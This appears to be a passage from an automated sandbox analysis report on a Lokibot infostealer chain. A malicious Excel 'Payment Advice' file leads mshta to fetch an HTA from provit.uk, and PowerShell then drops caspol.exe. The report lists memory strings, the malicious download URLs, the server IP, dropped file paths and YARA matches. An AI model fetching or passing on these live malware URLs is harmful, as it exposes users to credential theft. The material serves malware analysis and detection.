Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000003.00000003.430469990.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.435076739.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000004.00000002.458561358.000000000362C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.508901590.00000000023AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000004.00000002.476910335.00000000122A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000004.00000002.458561358.0000000002271000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, rrwscqkDSNwLK.exe, 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.508901590.00000000021A1000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 00000026.00000002.521745437.0000000002491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rrwscqkDSNwLK.exe, rrwscqkDSNwLK.exe, 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 00000004.00000002.476910335.00000000122A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.476910335.00000000122A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.476910335.00000000122A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.476910335.00000000122A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000003.00000003.435047316.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.435279648.00000000002EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.428761225.00000000002EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500808839.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502809223.0000000000365000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502662622.0000000000364000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/
Source: mshta.exe, 00000003.00000003.428761225.00000000002BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.000000000030F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.00000000002FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.000000000030F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.00000000002FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.00000000002FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.000000000030F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503022629.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.xls, 2D330000.0.dr	String found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion
Source: mshta.exe, 00000003.00000002.435279648.0000000000293000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestiond
Source: mshta.exe, 00000003.00000002.435279648.0000000000293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.428761225.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.000000000030F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestiong
Source: mshta.exe, 00000003.00000003.435076739.0000000002F41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002F41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002F41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.0000000000320000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.000000000030F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.000000000030F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionk.hta
Source: mshta.exe, 00000003.00000002.435279648.0000000000293000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestiony
Source: mshta.exe, 0000001B.00000002.502762634.00000000002AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionyX
Source: mshta.exe, 0000001B.00000003.502670469.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/PII
Source: mshta.exe, 00000003.00000003.435047316.0000000002EE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436209780.0000000002EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/l
Source: mshta.exe, 00000003.00000002.435279648.00000000002EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.428761225.00000000002EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/m
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49170 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.caspol.exe.36cfc30.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 11.2.caspol.exe.36cfc30.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 11.2.caspol.exe.36cfc30.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 11.2.caspol.exe.36cfc30.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.caspol.exe.36e9c50.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 11.2.caspol.exe.36e9c50.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 11.2.caspol.exe.36e9c50.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 11.2.caspol.exe.36e9c50.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: caspol.exe PID: 3064, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 2148, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1988, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Excel sheet contains many unusual embedded objects

Source: Payment Advice.xls	OLE: Microsoft Excel 2007+
Source: ~DFAAE5253A99F2DBD6.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: 2D330000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta

Jump to behavior

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\caspol.exe			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 770B0000 page execute and read and write

Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 11_2_001C04C0	11_2_001C04C0
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 11_2_001C2808	11_2_001C2808
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 11_2_001CBD40	11_2_001CBD40
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 11_2_001C1047	11_2_001C1047
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 11_2_001C108F	11_2_001C108F
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 11_2_001CC178	11_2_001CC178
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 11_2_001CC5B0	11_2_001CC5B0
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 11_2_001CD9D8	11_2_001CD9D8
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 11_2_001CCAF8	11_2_001CCAF8
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001D04C0	21_2_001D04C0
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001D2808	21_2_001D2808
